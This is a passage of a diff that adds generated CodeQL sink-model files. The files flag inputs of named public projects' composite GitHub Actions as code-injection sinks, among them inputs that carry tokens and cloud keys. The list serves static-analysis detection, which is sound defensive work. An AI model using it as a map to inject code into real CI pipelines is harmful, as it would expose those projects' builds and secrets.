@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml new file mode 100644 index 00000000000..faf1d7ed5c5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml new file mode 100644 index 00000000000..12ae92c149b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml new file mode 100644 index 00000000000..61001620017 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml new file mode 100644 index 00000000000..1d30610cfd1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml new file mode 100644 index 00000000000..867dc33f432 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml new file mode 100644 index 00000000000..87b014cbdd6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml new file mode 100644 index 00000000000..6dd3ac94306 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml new file mode 100644 index 00000000000..f952bd1da93 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml new file mode 100644 index 00000000000..977662bfa65 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml new file mode 100644 index 00000000000..4c6c92fdefd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml new file mode 100644 index 00000000000..45c2c1d780a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml new file mode 100644 index 00000000000..1edfbfc9432 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml new file mode 100644 index 00000000000..658283336bd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml new file mode 100644 index 00000000000..d00b30874cc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml new file mode 100644 index 00000000000..94ece1a58a0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml new file mode 100644 index 00000000000..46d5a4383f4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml new file mode 100644 index 00000000000..5627a31bd90 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml new file mode 100644 index 00000000000..98d2d8bcbf7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml new file mode 100644 index 00000000000..57fb2e71064 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml new file mode 100644 index 00000000000..8a216b97e1e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml new file mode 100644 index 00000000000..735413808ec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml new file mode 100644 index 00000000000..54334359d0e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml new file mode 100644 index 00000000000..67826ea9c0f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml new file mode 100644 index 00000000000..d0540414702 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml new file mode 100644 index 00000000000..9020a979bbb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml new file mode 100644 index 00000000000..91c84fda1d1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml new file mode 100644 index 00000000000..5031ff1e4ca --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 00000000000..fc3a7ebe253 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml new file mode 100644 index 00000000000..b7a664d512f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml new file mode 100644 index 00000000000..234f13b7387 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml new file mode 100644 index 00000000000..164ba02c42b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml new file mode 100644 index 00000000000..17fb61eeeb1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml new file mode 100644 index 00000000000..8513c7da64d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml new file mode 100644 index 00000000000..a4ab8f025d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml new file mode 100644 index 00000000000..7d82b2d3e9e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml new file mode 100644 index 00000000000..e466e17ddb4 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml new file mode 100644 index 00000000000..53881157a23 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", 